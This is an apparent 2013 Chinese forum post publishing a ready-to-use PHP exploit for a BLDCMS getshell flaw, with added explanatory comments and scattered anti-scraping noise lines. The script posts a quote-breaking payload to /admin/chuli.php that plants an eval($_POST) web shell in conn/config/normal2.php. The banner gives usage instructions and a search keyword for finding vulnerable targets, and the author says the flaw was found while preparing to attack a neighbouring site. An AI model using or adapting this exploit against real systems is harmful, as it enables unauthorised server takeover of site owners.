之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，我就下载看了，找到了一个 getshell 漏洞。
4 ]# r+ X" q* L3 h* r9 e9 F8 H
话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。
既然都有人发了，我就把我之前写好的 EXP 放出来吧。
% k) I! c& f3 u/ E4 h6 g6 M
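<?php
// BLDCMS (白老大 PHP novel scraper) "getshell" proof-of-concept as posted by
// 数据流, 2013-03-21.
//
// Reconstructed from a garbled forum paste: the original lines were
// interleaved with anti-scraping noise and wrapped mid-token (`$ev` / `al;`),
// the forum software rendered `empty` as `emptyempty`, and the request line
// read " OST". A POST is assumed for that line, since the request carries a
// form-encoded body and a Content-Length header.
//
// What the visible code does: it sends one HTTP/1.1 POST to
// /admin/chuli.php?action=a_1 on port 80 whose `sqlite` field carries a
// quote-breaking fragment `';eval($_POST["<pass>"]);'`, then prints the path
// conn/config/normal2.php as the place to connect a one-line-shell client to.
// Per the banner it relies on magic_quotes_gpc being off (the single quote
// must reach the target unescaped). The server response is read but never
// inspected, so the final "success" line is printed unconditionally.
//
// Usage: php EXP.php <host> <cms-dir> <password>
//   $argv[1]  target hostname; also sent as the Host header
//   $argv[2]  web path of the CMS install; only echoed in the final hint
//   $argv[3]  the $_POST key the planted eval() will read
//
// NOTE(review): this plants a web shell on the target. Run it only against
// systems you are explicitly authorised to test.

echo "--------------------------------------------------------------------\r\n"
   . " BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n"
   . " Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n"
   . " 2013.3.21\r\n"
   . " 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
   . " 搜索关键字:\"开发者: 白老大小说\"\r\n"
   . "--------------------------------------------------------------------\r\n";

// isset() guards only suppress "undefined offset" notices when an argument
// is missing; the empty() check below is what actually rejects the run.
$url  = isset($argv[1]) ? $argv[1] : '';
$dir  = isset($argv[2]) ? $argv[2] : '';
$pass = isset($argv[3]) ? $argv[3] : '';

// Closes the single-quoted value on the target side, appends the eval()
// call, and re-opens the quote so the surrounding statement stays valid.
$eval = '\';eval($_POST["' . $pass . '"]);\'';

if (empty($pass) || empty($url)) {
    exit("请输入参数");
}

// Form body. Note that $eval is appended without urlencoding; a $pass
// containing '&', '+' or '%' would be mangled by the receiver.
$fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;
$length   = strlen($fuckdata);

/**
 * Sends the crafted POST to the target and prints the shell location.
 *
 * Both parameters are immediately shadowed by the globals of the same name
 * (kept as in the original); the real inputs are the globals $url, $length
 * and $fuckdata. $dir is read by the final echo, $eval is unused here.
 * Exits the process on connection or write failure.
 */
function getshell($url, $pass)
{
    global $url, $dir, $pass, $eval, $length, $fuckdata;

    $header  = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $header .= "User-Agent: MSIE\r\n";
    $header .= "Host:" . $url . "\r\n";
    $header .= "Content-Length: " . $length . "\r\n";
    $header .= "Connection: Close\r\n";
    $header .= "\r\n";
    $header .= $fuckdata . "\r\n\r\n";

    // Plain TCP on port 80 with a 15 s connect timeout; no TLS support.
    $fp = fsockopen($url, 80, $errno, $errstr, 15);
    if (!$fp) {
        exit("利用失败:请检查指定目标是否能正常打开");
    }
    if (!fputs($fp, $header)) {
        exit("利用失败");
    }

    // Drain the response so the server can finish; the body is discarded,
    // so a 403/404 or an escaped payload is not detected here.
    $receive = '';
    while (!feof($fp)) {
        $receive .= @fgets($fp, 1000);
    }
    @fclose($fp);

    echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
}

getshell($url, $pass);
?>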
% M- J9 Y5 T2 v! \) r$ d $ K2 ~8 c. p9 }1 j( A* L) F; F
% F4 ~$ t8 p2 `- M ]: { - W6 \% Y1 c, C/ Q2 j
by 数据流
9 A% n. e8 q7 p% Z |